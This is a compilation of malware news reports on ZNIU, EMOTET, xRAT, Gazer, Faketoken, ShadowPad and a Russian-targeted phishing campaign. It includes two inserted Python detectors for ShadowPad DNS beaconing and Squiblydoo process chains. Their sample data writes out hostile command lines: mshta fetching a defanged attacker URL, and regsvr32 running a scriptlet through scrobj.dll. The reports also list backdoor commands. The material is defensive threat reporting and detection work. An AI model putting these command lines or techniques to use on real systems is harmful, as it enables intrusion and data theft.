Android Malware ZNIU exploits DirtyCow to gain root privileges

Nearly a year after the disclosure of the Dirty COW vulnerability that affected the Linux kernel, cybercriminals have started exploiting the vulnerability against Android users.

Publicly disclosed last year in October, Dirty COW was present in a section of the Linux kernel—a part of virtually every Linux distribution, including Red Hat, Debian, and Ubuntu—for years and was actively exploited in the wild.

The vulnerability allows an unprivileged local attacker to gain root access through a race condition issue, gain access to read-only root-owned executable files, and permit remote attacks.

Security researchers from Trend Micro published a blog post on Monday disclosing that the privilege escalation vulnerability (CVE-2016-5195), known as Dirty COW, has now been actively exploited by a malware sample of ZNIU, detected as AndroidOS_ZNIU.

The ZNIU malware was detected in more than 40 countries last month, with the majority of the victims found in China and India. The malware was also detected in the U.S., Japan, Canada, Germany, and Indonesia. As of this writing, more than 5,000 affected users have been detected.

The malware uses the Dirty COW exploit to root Android devices via the copy-on-write (COW) mechanism in Android’s Linux kernel and install a backdoor which can then be used by attackers to collect data and generate profit through a premium rate phone number.

ZNIU’s leveraging of Dirty COW only works on Android devices with ARM/X86 64-bit architecture. However, this recent exploit can bypass SELinux and plant a root backdoor, while the PoC can only modify the service code of the system.

INFECTION CHAIN

The ZNIU malware often appears as a porn app downloaded from malicious websites, where users are tricked into clicking on a malicious URL that installs the malware-carrying app on their device. Once launched, ZNIU will communicate with its C&C server. If an update to its code is available, it retrieves it from the C&C server and loads it into the system. Simultaneously, the Dirty COW exploit will be used to provide local privilege escalation to overcome system restrictions and plant a backdoor for potential remote control attacks in the future.

Figure 2: ZNIU infection chain

After entering the main UI of the device, the malware will harvest the carrier information of the user. It then transacts with the carrier through an SMS-enabled payment service, allowing the malware operator to pose as the device owner. Through the victim’s mobile device, the operator behind ZNIU will collect money through the carrier’s payment service. In one of the samples, the payments in its code were directed to a dummy company which, based on network traffic, was located in a city in China. When the SMS transaction is over, the malware will delete the messages from the device, leaving no sign of the transaction between the carrier and the malware operator. If the carrier is outside China, no SMS transaction with the carrier is possible, but the malware will still exploit the system to plant a backdoor.

The main logic of ZNIU’s native code works as follows:

1. Collect the model information of the device.

2. Fetch appropriate rootkits from the remote server.

3. Decrypt the exploits.

4. Trigger exploits one by one, check the result, and remove exploit files.

5. Report if the exploit succeeded or failed.

The researchers found the malware has already infected more than 5,000 Android users across 40 countries in recent weeks, with the majority of victims found in China and India, while others reside in the United States, Japan, Canada, Germany and Indonesia.

Google has released an update for Android that, among other fixes, officially fixes the Dirty COW vulnerability. The tech giant also confirmed that its Play Protect now protects Android users against this malware.

The easiest way to prevent yourself from being targeted by such clever malware is to avoid downloading apps from third-party sources and always stick to the official Google Play Store.


EMOTET spreading through spam botnet

The banking malware EMOTET, which was first detected in 2014, is back. Researchers at Trend Micro have discovered a spam campaign targeting all sectors and industries, unlike its previous variant.

The United States, United Kingdom, and Canada made up the bulk of the target regions, with the US taking up 58% of all our detected infections, while Great Britain and Canada were at 12% and 8% respectively.


These new variants use multiple ways to spread. Its primary propagation method involves the use of a spam botnet, which results in its rapid distribution via email. EMOTET can also spread via a network propagation module that brute forces its way into an account domain using a dictionary attack. EMOTET’s use of compromised URLs as C&C servers likely helped it spread as well.

For a malware with email-spamming and lateral-movement capabilities, infecting business systems and acquiring corporate e-mails translates to larger and more effective spam targeting and a higher chance of gaining information.


The new EMOTET variants initially arrive as spam claiming to be an invoice or payment notification to trick its victims into believing that this is a legitimate email from a supplier.

In the body of this email is a malicious URL that will download a document containing a malicious macro when a user clicks on it. This macro will then execute a PowerShell command line that is responsible for downloading EMOTET.

Once downloaded, EMOTET drops and executes copies of itself into the following folders:

  • If EMOTET has no admin privileges, it will drop the copies into %AppDataLocal%\Microsoft\Windows\{string 1}{string 2}.exe
  • If EMOTET has admin privileges, it will instead drop the copies into %System%\{string 1}{string 2}.exe

The malware will attempt to ease its entry into the system by deleting the Zone Identifier Alternate Data Stream (ADS), which is a string of information that describes the Internet Explorer Trust Settings of the file’s download source. This is one way for the system to find out if a downloaded file is from a high-risk source, blocking the download if it is detected as such.

EMOTET will then register itself as a system service and add registry entries to ensure that it is automatically executed at every system startup. A typical Windows service acts as a “controller” for most hardware-based applications, while others are used to control other applications. The EMOTET malware, on the other hand, uses its service both for elevation of privilege and as an autostart mechanism.

EMOTET will list the system’s currently running processes and then proceed to gather information on both the system itself and the operating system used.

It will then connect to the Command & Control (C&C) servers to update to its latest version, as well as to determine the type of payload that it will deliver. One of the possible payloads is the persistent banking trojan known as DRIDEX, which attempts to harvest banking account information via browser monitoring routines. Furthermore, the malware can also turn the infected system into part of a botnet that sends spam emails intended to spread the malware even further. This allows the trojan to spread quickly, as the more systems it can potentially infect, the faster it will propagate. The malware is also capable of harvesting email information and stealing username and password information found in installed browsers.

We discovered that, in addition to the above payloads, the C&C server is responsible for sending modules that perform the following routines:

  • Spamming Module
  • Network Worm Module
  • Mail Password Viewer
  • Web Browser Password Viewer

PREVENTION & MITIGATION

Preventing this malware from infecting your machine requires the usual security measures: do not open attachments from unknown email senders or sources, do not click on links that are not trusted, and always use a good AV solution.


xRAT – A new sophisticated malware

Researchers at Lookout have identified a mobile trojan called xRAT with extensive data collection functionality and the ability to remotely run a suicide function to avoid detection. The malware is associated with the high-profile Xsser / mRAT malware, which made headlines after targeting both iOS and Android devices of pro-democracy Hong Kong activists in late 2014.

xRAT has many similarities with mRAT: it has the same structure and uses the same decryption key. Analysis of the code revealed that both malware families use the same naming conventions, which suggests that both malicious codes were developed by the same threat actor.

According to researchers from security firm Lookout, the command and control (C&C) servers used by the xRAT malware are the same as those used by a Windows malware, a circumstance that suggests the threat actor is composed of experienced experts.


xRAT supports an impressive set of capabilities that include flexible reconnaissance and information gathering, detection evasion, specific checks for antivirus, and app and file deletion functionality. It also searches for data belonging to popular communications apps like QQ and WeChat.

Listed below are the types of data gathered by xRAT and features that enable it to perform reconnaissance, run remote code, and exfiltrate data from Android devices:

  • Browser history
  • Device metadata (such as model, manufacturer, SIM number, and device ID)
  • Text messages
  • Contacts
  • Call logs
  • Data from QQ and WeChat
  • Wifi access points a device has connected to and the associated passwords
  • Email database and any email account username / passwords
  • Device geolocation
  • Installed apps, identifying both user and system applications
  • SIM Card information
  • Provide a remote attacker with a shell
  • Download attacker specified files and save them to specified locations
  • Delete attacker specified files or recursively delete specified directories
  • Enable airplane mode
  • List all files and directories on external storage
  • List the contents of attacker specified directories
  • Automatically retrieve files that are of an attacker specified type that are between a minimum and maximum size
  • Search external storage for a file with a specific MD5 hash and, if identified, retrieve it
  • Upload attacker specified files to C2 infrastructure
  • Make a call out to an attacker specified number
  • Record audio and write it directly to an already established command and control network socket
  • Execute an attacker specified command as the root user
  • Download a 22MB trojanized version of QQ from hiapk[.]com, saving it to /sdcard/.wx/wx.apk. Referred to as ‘rapid flow mode’.

To avoid detection, xRAT implements a “suicide” function that can be triggered to clean the installation from the infected mobile device.

The developers behind xRAT created an alert system, flagging to the malware operator if any of the following antivirus applications are present on a compromised device.

  • 管家 (housekeeper)
  • 安全 (safety)
  • 权限 (Authority)
  • 卫士 (Guardian)
  • 清理 (Cleanup)
  • 杀毒 (Antivirus)
  • Defender
  • Security

xRAT can be remotely instructed to perform a wide range of deletion operations, such as removing large portions of a device or attacker-specified files like images from certain directories on the SDCard, all apps and data from /data/data/, and all system apps from /system/app/.

Most of the C&C infrastructure used by xRAT in the past was based in China, but the samples recently analyzed by the company were located in the United States.

As anticipated, the C&C infrastructure also controlled a Windows malware; the experts also noticed a malicious executable named MyExam, which means that “the actors behind this family may be continuing to target students, similar to how attackers used mRAT during the protests in 2014.”

Gazer: A backdoor targeting Ministries and Embassies

ESET security researchers have discovered a new malware campaign targeting consulates, ministries and embassies, which is believed to be carried out by the Turla advanced persistent threat (APT) hacking group.

Active since 2016, the malware campaign is leveraging a new backdoor, dubbed Gazer and written in C++, which is delivered via spear-phishing emails and hijacks targeted computers.

The attacks show all the hallmarks of past campaigns launched by the Turla hacking group, namely:

  • Targeted organizations are embassies and ministries;
  • Spearphishing delivers a first-stage backdoor such as Skipper;
  • A second stealthier backdoor (Gazer in this instance, but past examples have included Carbon and Kazuar) is put in place;
  • The second-stage backdoor receives encrypted instructions from the gang via C&C servers and evades detection by using compromised, legitimate websites as a proxy.
Instead of using Windows Crypto API, Gazer uses custom 3DES and RSA encryption libraries to encrypt the data before sending it to the C&C server—a common tactic employed by the Turla APT group.

Gazer uses code-injection technique to take control of a machine and hide itself for a long period of time in an attempt to steal information.

Gazer backdoor also has the ability to forward commands received by one infected endpoint to the other infected machines on the same network.

So far ESET researchers have identified four different variants of the Gazer malware in the wild.

Earlier versions of Gazer were signed with a valid certificate issued by Comodo for “Solid Loop Ltd,” while the latest version is signed with an SSL certificate issued to “Ultimate Computer Support Ltd.”

Figure: Certificates used to sign the malware variants

According to researchers, Gazer has already managed to infect a number of targets worldwide, with the most victims being located in Europe.

Full technical analysis of the malware can be found here.

Android Trojan now targeting other non-banking apps

Security researchers at Kaspersky Lab have discovered a new variant of the Android banking Trojan called Faketoken that now has capabilities to detect and record an infected device’s calls and display overlays on top of taxi booking apps to steal banking information.

Dubbed Faketoken.q, the new variant of the mobile banking trojan is being distributed using bulk SMS messages as its attack vector, prompting users to download an image file that actually downloads the malware.

The mobile Trojan that we examined consists of two parts. The first part is an obfuscated dropper (verdict: Trojan-Banker.AndroidOS.Fyec.az): files like this are usually obfuscated on the server side in order to resist detection. At first glance, it may seem that its code is gibberish.

However, this code works quite well. It decrypts and launches the second part of the malware. This is standard practice these days, whereas unpacked Trojans are very rare.

The second part of the malware, which is a file with a DAT extension, contains the malware’s main features. Its data is encrypted.

By decrypting the data, it is possible to obtain a rather legible code.

After the Trojan initiates, it hides its shortcut icon and starts to monitor all of the calls and whichever apps the user launches. Upon receiving a call from (or making a call to) a certain phone number, the malware begins to record the conversation and sends it to evildoers shortly after the conversation ends.


The authors of Faketoken.q kept the overlay features and simplified them considerably. So, the Trojan is capable of overlaying several banking and miscellaneous applications, such as Android Pay, Google Play Store, and apps for paying traffic tickets and booking flights, hotel rooms, and taxis.

Faketoken.q monitors active apps and, as soon as the user launches a specific one, it substitutes its UI with a fake one, prompting the victim to enter his or her bank card data. The substitution happens instantaneously, and the colors of the fake UI correspond to those of the original launched app.

Since fraudsters require an SMS code sent by the bank to authorise a transaction, the malware steals incoming SMS message codes and forwards them to the attackers’ command-and-control (C&C) server to complete the attack.

According to the researchers, Faketoken.q has been designed to target Russian-speaking users, as it uses the Russian language on the user interface.

PREVENTION & MITIGATION

The easiest way to prevent yourself being a victim of such mobile banking Trojans is to avoid downloading apps via links provided in messages or emails, or any third-party app store.

You can also go to Settings → Security and make sure “Unknown sources” option is turned off in order to block installation of apps from unknown sources.

Most importantly, verify app permissions before installing apps, even if they are downloaded from the official Google Play store. If you find any app asking for more than what it is meant to do, just do not install it.

It’s always a good idea to install an antivirus app from a reputed vendor that can detect and block such malware before it can infect your device, and always keep your system and apps up-to-date.

ShadowPad backdoor spreads through software update

Kaspersky Lab discovered that attackers were able to modify the NetSarang software update to include a malware tracked as the ShadowPad backdoor.

Founded in 1997, NetSarang Computer, Inc. develops, markets and supports secure connectivity solutions and specializes in the development of server management tools for large corporate networks.

In July, researchers at Kaspersky Lab were investigating suspicious DNS requests in a partner’s network. The requests were found on systems used to process transactions in a customer’s network in the financial industry.

Further investigation into the DNS queries led them to NetSarang, which promptly sanitized its software update process by removing the malicious library nssock2.dll from its update package.

“In July 2017, during an investigation, suspicious DNS requests were identified in a partner’s network. The partner, which is a financial institution, discovered the requests originating on systems involved in the processing of financial transactions.” states the analysis published by Kaspersky.

The analysis showed that recent versions of software produced and distributed by NetSarang had been surreptitiously modified to include an encrypted payload that could be remotely activated by a knowledgeable attacker.

The backdoor was embedded into one of the code libraries used by the software (nssock2.dll):

Figure: Disposition of the NSSOCK2.DLL binary with embedded malicious code

The attackers hid their malicious intent in several layers of encrypted code. The tiered architecture prevents the actual business logic of the backdoor from being activated until a special packet is received from the first-tier command and control (C&C) server (“activation C&C server”). Until then, it only transfers basic information, including the computer, domain and user names, every 8 hours.

Activation of the payload would be triggered via a specially crafted DNS TXT record for a specific domain. The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be “nylalobghyhirgh.com”.

Figure: Only when triggered by the first layer of C&C servers does the backdoor activate its second stage

The module performs a quick exchange with the controlling DNS server and provides basic target information (domain and user name, system date, network configuration) to the server. The C&C DNS server in return sends back the decryption key for the next stage of the code, effectively activating the backdoor.
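The first-tier behaviour described above (a basic check-in every 8 hours, activation via a DNS TXT lookup of a month/year-derived domain) is something a defender can look for in DNS logs. The following is an added example, not code from Kaspersky or NetSarang; it assumes the check-ins are themselves DNS queries to the controlling server, the log lines are constructed, and only nylalobghyhirgh.com comes from the analysis.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import re
from typing import Dict, List, Tuple

# Constructed DNS query log, one "<timestamp> <client-ip> <qtype> <qname>" per line.
# Only nylalobghyhirgh.com comes from the analysis; hosts, times and other names are made up.
SAMPLE_LOG = """\
2017-08-14T00:02:11 10.1.2.3 A cdn.example.net
2017-08-14T00:05:40 10.1.2.3 TXT nylalobghyhirgh.com
2017-08-14T08:05:52 10.1.2.3 TXT nylalobghyhirgh.com
2017-08-14T16:06:03 10.1.2.3 TXT nylalobghyhirgh.com
2017-08-15T00:06:10 10.1.2.3 TXT nylalobghyhirgh.com
2017-08-14T09:00:00 10.1.2.9 TXT _dmarc.example.net
2017-08-14T10:00:00 10.1.2.9 TXT _dmarc.example.net
2017-08-15T11:00:00 10.1.2.3 A www.example.net
"""

# August 2017 activation domain named in the analysis; a real deployment would hold
# the full published IoC list, including the other month/year-derived domains.
KNOWN_ACTIVATION_DOMAINS = {"nylalobghyhirgh.com"}
BEACON_PERIOD = timedelta(hours=8)      # first-tier check-in interval from the analysis
TOLERANCE = timedelta(minutes=5)        # jitter allowed around that interval (assumption)

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_log(text: str) -> List[Tuple[datetime, str, str, str]]:
    """Parse log lines into (timestamp, client, qtype, qname); malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, qtype, qname = m.groups()
        rows.append((datetime.fromisoformat(ts), client, qtype.upper(), qname.lower().rstrip(".")))
    return rows


def txt_queries_by_client(rows) -> Dict[Tuple[str, str], List[datetime]]:
    """Group TXT query timestamps by (client, queried name); other record types are ignored."""
    groups: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, client, qtype, qname in rows:
        if qtype == "TXT":
            groups[(client, qname)].append(ts)
    return groups


def is_periodic(times: List[datetime], period: timedelta = BEACON_PERIOD,
                tol: timedelta = TOLERANCE, min_gaps: int = 3) -> bool:
    """True when there are at least min_gaps consecutive gaps, all within tol of period."""
    times = sorted(times)
    if len(times) < min_gaps + 1:
        return False
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    return all(abs(gap - period) <= tol for gap in gaps)


def detect_shadowpad_beacons(text: str) -> List[dict]:
    """One finding per (client, domain) that matches the IoC list or beacons every ~8 hours."""
    findings = []
    for (client, qname), times in txt_queries_by_client(parse_log(text)).items():
        reasons = []
        if qname in KNOWN_ACTIVATION_DOMAINS:
            reasons.append("TXT query to known ShadowPad activation domain")
        if is_periodic(times):
            reasons.append(f"{len(times)} TXT queries on a ~{BEACON_PERIOD} cadence")
        if reasons:
            findings.append({"client": client, "domain": qname, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in detect_shadowpad_beacons(SAMPLE_LOG):
        print(finding)
```

The cadence check catches a host beaconing to a domain that is not yet on the IoC list, which matters here because the activation domain changes every month.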

The analysis indicates the embedded code acts as a modular backdoor platform. It can download and execute arbitrary code provided by the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim.

Kaspersky Lab revealed that the first known compile date for the ShadowPad backdoor is July 13; the attackers signed the malicious code with a legitimate NetSarang certificate.

Kaspersky confirmed an activated payload in a company in Hong Kong. Given that the NetSarang programs are used in hundreds of critical networks around the world, on servers and workstations belonging to system administrators, it is strongly recommended that companies take immediate action to identify and contain the compromised software.

Kaspersky published the list of Indicators of Compromise to help companies to check their systems.


Malicious Email campaign targets Russian-Speaking companies

A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system. The attack abuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and blocking more challenging, particularly by whitelisting-based solutions.

The campaign, discovered by Trend Micro, has been active for the last 2 months and is targeting Russian-speaking firms.

The hackers leverage several exploits and Windows components to run malicious scripts and avoid detection. The last sample associated with this attack was uploaded to VirusTotal on June 6, 2017, and experts at Trend Micro observed five spam campaigns running from June 23 to July 27, 2017.


The phishing messages are designed to appear as if they were sent from sales and billing departments and contain a weaponized Rich Text Format (RTF) file that exploits the CVE-2017-0199 flaw in Microsoft Office’s Windows Object Linking and Embedding (OLE) interface.

Their limited distribution and specificity in social engineering lures are red flags that may indicate they are a spear-phishing campaign.

Once the exploit code is executed, it downloads a fake Excel XLS file embedded with malicious JavaScript. When opened, the Excel header is ignored and the file is treated as an HTML Application file by the Windows component mshta.exe.

“The exploit code downloads what is supposedly an XLS file from hxxps://wecloud[.]biz/m11[.]xls. This domain, to which all of the URLs used by this attack point to, is controlled by the attacker and was registered in early July.” states the analysis published by Trend Micro.

“This fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored and the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens HTA or HTML files.”

The JavaScript code calls the legitimate odbcconf.exe executable to run the DLL. Once executed, the DLL drops a SCT file (Windows scriptlet) in the %APPDATA% folder and appends the .TXT extension to it.

The DLL is used to carry out a Squiblydoo attack, which leverages Regsvr32 (Microsoft Register Server) to bypass restrictions on running scripts and evade application whitelisting protections such as AppLocker.

“This particular command uses the Regsvr32 (Microsoft Register Server) command-line utility, which is normally used to register and unregister OLE controls in the Windows registry, including DLL files. This attack method is also known as Squiblydoo—Regsvr32 is abused to bypass restrictions on running scripts.” continues the analysis. “It also means evading application white-listing protections such as AppLocker. While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe.”

Next, the real backdoor is downloaded and executed: it is an XML file downloaded from the domain wecloud[.]biz. In this case too, it is executed using the same Regsvr32-abusing Squiblydoo technique.
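The delivery chain above (Office exploit, mshta.exe, odbcconf.exe, then Regsvr32 running a scriptlet dropped as a .txt under %APPDATA%) is visible in process-creation telemetry, which is where a defender can catch it even when the script contents are obfuscated. The following is an added example, not code from Trend Micro: the events are constructed in a Sysmon-like shape, the file paths are made up, and the regsvr32 form with scrobj.dll is the standard Squiblydoo invocation rather than a detail taken from the analysis.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable basename, lower-case
    cmdline: str


# Constructed process-creation events (Sysmon-style fields), not real telemetry.
# The chain mirrors the analysis: RTF exploit -> mshta.exe -> odbcconf.exe -> regsvr32.exe.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe", r'"C:\Program Files\Microsoft Office\WINWORD.EXE" invoice.rtf'),
    # the fake .xls is really an HTA, so it ends up in mshta.exe
    ProcEvent(300, 200, "mshta.exe", "mshta.exe hxxps://wecloud[.]biz/m11[.]xls"),
    # the HTA's JavaScript runs the DLL through odbcconf.exe (path is made up)
    ProcEvent(400, 300, "odbcconf.exe", r"odbcconf.exe /a {REGSVR C:\Users\u\AppData\Roaming\n.dll}"),
    # Squiblydoo: regsvr32 executes the scriptlet that was dropped as a .txt in %APPDATA%
    ProcEvent(500, 400, "regsvr32.exe", r"regsvr32.exe /s /n /u /i:C:\Users\u\AppData\Roaming\m.txt scrobj.dll"),
    # ordinary registration from the shell, kept for contrast
    ProcEvent(600, 100, "regsvr32.exe", r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),
]

LOLBIN_PARENTS = {"mshta.exe", "odbcconf.exe"}
SCRIPTLET_EXTS = (".sct", ".txt", ".xml")
INSTALL_ARG_RE = re.compile(r"/i:(\S+)", re.IGNORECASE)


def regsvr32_reasons(cmdline: str) -> List[str]:
    """Reasons a regsvr32 command line looks like scriptlet execution rather than DLL registration."""
    reasons = []
    low = cmdline.lower()
    m = INSTALL_ARG_RE.search(low)
    if m:
        target = m.group(1).strip('"')
        if target.startswith(("http://", "https://", "hxxp")):
            reasons.append("/i: argument is a URL")
        elif target.endswith(SCRIPTLET_EXTS):
            reasons.append(f"/i: argument is a scriptlet-like file (*{target[target.rfind('.'):]})")
        if "\\appdata\\" in target:
            reasons.append("/i: target lives under %APPDATA%")
    if "scrobj.dll" in low:
        reasons.append("loads scrobj.dll, the scriptlet COM server")
    return reasons


def ancestors(event: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 4) -> List[str]:
    """Image names of the parent chain, nearest parent first."""
    chain, current = [], by_pid.get(event.ppid)
    while current is not None and len(chain) < max_depth:
        chain.append(current.image)
        current = by_pid.get(current.ppid)
    return chain


def detect_squiblydoo_chain(events: List[ProcEvent]) -> List[dict]:
    """Flag regsvr32 launches that carry scriptlet indicators or descend from mshta/odbcconf."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if e.image != "regsvr32.exe":
            continue
        reasons = regsvr32_reasons(e.cmdline)
        chain = ancestors(e, by_pid)
        lolbin = [p for p in chain if p in LOLBIN_PARENTS]
        if lolbin:
            reasons.append("spawned under " + " <- ".join(lolbin))
        if reasons:
            findings.append({"pid": e.pid, "chain": chain, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in detect_squiblydoo_chain(SAMPLE_EVENTS):
        print(finding)
```

The parent-chain check is what separates this campaign's use of odbcconf.exe from generic Squiblydoo rules that only look at the regsvr32 command line.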

The analysis states that “This is another SCT file with obfuscated JavaScript code that contains backdoor commands, which essentially allow attackers to take over an infected system. It tries to connect to its C&C server at hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks to carry out, some of which are:

  • d&exec = download and execute PE file
  • gtfo = delete files/startup entries and terminate
  • more_eggs = download additional/new scripts
  • more_onion = run new script and terminate current script
  • more_power = run command shell commands”

While the later stages of the infection chain required the use of various Windows components, the entry point still involves the use of a Microsoft Office exploit. Patching and keeping software up-to-date will protect users. Alternately, employing firewalls, intrusion detection and prevention systems, virtual patching, and URL categorization, as well as enforcing robust patch management policies, will significantly reduce the system’s attack surface.